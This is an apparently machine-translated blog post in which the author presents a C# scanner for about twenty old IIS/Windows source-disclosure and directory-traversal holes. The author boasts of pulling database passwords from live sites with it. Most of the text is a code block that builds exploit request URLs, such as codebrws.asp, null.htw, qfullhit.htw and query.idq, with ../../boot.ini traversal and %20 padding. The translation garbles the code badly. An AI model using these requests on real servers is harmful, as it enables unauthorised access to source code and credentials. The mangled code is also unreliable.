It is well known that the Windows platform vulnerability, the patch is one, but it always makes it up. I summed up the 20 ways I know, and I wrote an application with C # to scan these vulnerabilities, I found that although most of the methods can no longer afford it, there are still some missions of the net fish. :), the result is true that many stations have been seen in these two days, including database passwords, if you can download the library with Access, and if you use SQL Server to connect to the TCP, you can also pass TCP. / IP network library connected to the database, for what you want. Top these 20 methods will be taken below:
.% 81 :: DATA% 2e% 2e% 41sp .htr / longhtr.bakcodebrws.aspshowcode.aspnull.htwqfullhit.htwqsumrhit.htwquery.idqsearch / qfullhit.htwsearch / qsumrhit.htwiirturnh.htw.htwTranslate: f
In the front of these vulnerabilities, 10 are directly plus them after the ASP file, as% 81 is xxx.asp% 81, followed by the examples of IIS comes with the example or system vulnerability, the most particularly That kind of translate : f method, it is unusable by browser, it must be established with the server to establish TCP / IP Socket connection, send requests, how to use it, see below, this is part of my application, if You have to go to my site to download.
switch (this.cboMethod.SelectedIndex) {case 0: // read directly strRequestFile = strServer strUrl; break; case 5: //% 2e% 41spstrRequestFile = strServer strPath strFirst "% 2e% 41sp"; break; case 8: // longtrstrrequestfile = strser strurl " % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%" " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% " " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20" "% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htr "; Break; Case 10: // C Odebrws.aspstrrequestfile = strserver "/iissample/exair/howitworks/codebrws.asp?source=" strurl; Break;
Case 11: //showcode.aspstrrequestfile = strser "/iissample/exair/howitworks/codebrws.asp?source=" " /msadc/../../../../boot.ini "; Break;
case 12: //null.htwstrRequestFile = strServer "/null.htw?CiWebHitsFile=" strUrl "% 20 & CiRestriction = none & CiHiliteType = Full "; break; case 13: //qfullhit.htwstrRequestFile = strServer " / iissamples / issamples /oop/qfullhit.htw?" "CiWebHitsFile = / .. / .. / boot.ini & CiRestriction = none" "& CiHiliteType = Full"; break; case 14: //qsumrhit.htwstrRequestFile = strServer "/ iissamples / issamples /oop/qsumrhit.htw?" "ciwebhitsfile = / .. / .. / boot.ini & copirestriction = none" "& cihilittype = ful"; Break;
Case 15: //query.idqstrrequestfile = strser "/query.idq?citeMplate=/../../boot.ini" "% 20% 20% 20% 20% 20% 20% 20% 20% 20 % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% " " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htx ";
case 16: //search/qfullhit.htwstrRequestFile = strServer "/iissamples/exair/search/qfullhit.htw?" " CiWebHitsFile = / .. / .. / boot.ini & CiRestriction = none " " & CiHiliteType = Full "; break; case 17: // search / qsumrhit.htwstrRequestFile = strServer "/iissamples/exair/search/qsumrhit.htw?" " CiWebHitsFile = / .. / .. / boot.ini & CiRestriction = none " " & CiHiliteType = Full Break;
Case 18: //iirturnh.htwstrrequestfile = strserver "/iishelp/iis/misc/iirturnh.htw?" " ciWebhitsFile = / .. / .. / boot.ini & circions = none "& cihilittype = full"; Break;
Case 19: //.htwstrrequestfile = strserver Strull "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20" "% 20 % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% " " 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " " % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% % 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% % 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20 " "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20" "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htw? " " CiWebhitsFile = / .. / .. / boot.ini & circions = none " " & cihilittype = full "; break; default: strrequestfile = strrserver strurl this.cbomethod .TEXT;
